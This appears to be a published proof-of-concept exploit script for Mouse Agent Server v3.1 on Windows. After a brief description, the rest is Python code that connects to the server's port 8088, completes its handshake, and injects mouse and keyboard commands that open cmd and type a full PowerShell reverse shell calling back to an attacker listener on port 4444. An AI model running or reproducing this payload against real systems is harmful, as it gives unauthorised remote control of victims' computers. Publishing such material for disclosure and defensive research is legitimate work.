# Exploit Title: Mouse Agent Server v3.1 - Remote Code Execution
# Date: 19/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.docs.kr/
# Software Link: http://192.168.8.100:8080/ (IOS/Android Mobile App
Interface)
# Version: 3.1 (Windows)
# Tested on: Windows 10 / Windows 11


'''
Description:

Mouse Agent Server v3.1 is vulnerable to unauthenticated RCE by simulating
mouse/keyboard inputs to force the target to execute a PowerShell reverse
shell. It works against default configurations by sending GUI automation
commands through port 8088.

'''

import socket
import time
import sys


LHOST = "192.168.8.101"
LPORT = 4444
RHOST = "192.168.8.102"
RPORT = 8088

def send(cmd, expect_response=False, delay=0.5):
    with socket.socket() as s:
        s.settimeout(5)
        s.connect((RHOST, RPORT))
        s.sendall(cmd.encode())
        if expect_response:
            return s.recv(1024).decode().strip()
        time.sleep(delay)

psh = f"powershell -nop -w hidden -c \"$c=New-Object
Net.Sockets.TCPClient('{LHOST}',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))
-ne 0){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d
2>&1 | Out-String);$sb=([text.encoding]::ASCII).GetBytes($o+'PS
'+(pwd).Path+'> ');$s.Write($sb,0,$sb.Length);$s.Flush()}};$c.Close()\""

print("[*] Starting attack sequence")


response = send("LIN:\r\n", True)
if response == "LIN:PASS":
    print("[+] Server requires password")
    password = input("[?] Enter server password (or leave blank to exit): ")
    if not password:
        print("[!] No password provided - exiting")
        sys.exit(1)
    response = send(f"LIN:{password}\r\n", True)
elif response != "LIN:OK":
    print(f"[!] Handshake failed (response: {response}) - aborting")
    sys.exit(1)

if response != "LIN:OK":
    print("[!] Authentication failed - check password")
    sys.exit(1)


print("[+] Authentication successful")
send("MUS:MOV,-9999,9999\r\n", False, 0.5)
send("MUS:MOV,15,-10\r\n", False, 0.5)
send("MUS:CLK,1\r\n", False, 2)
send("KEY:STR,cmd\r\n", False, 1)
send("KEY:SIM,RETURN\r\n", False, 3)
send(f"KEY:STR,{psh}\r\n", False, 0.5)
send("KEY:SIM,RETURN\r\n", False, 1)

print("[+] Payload delivered - check your listener")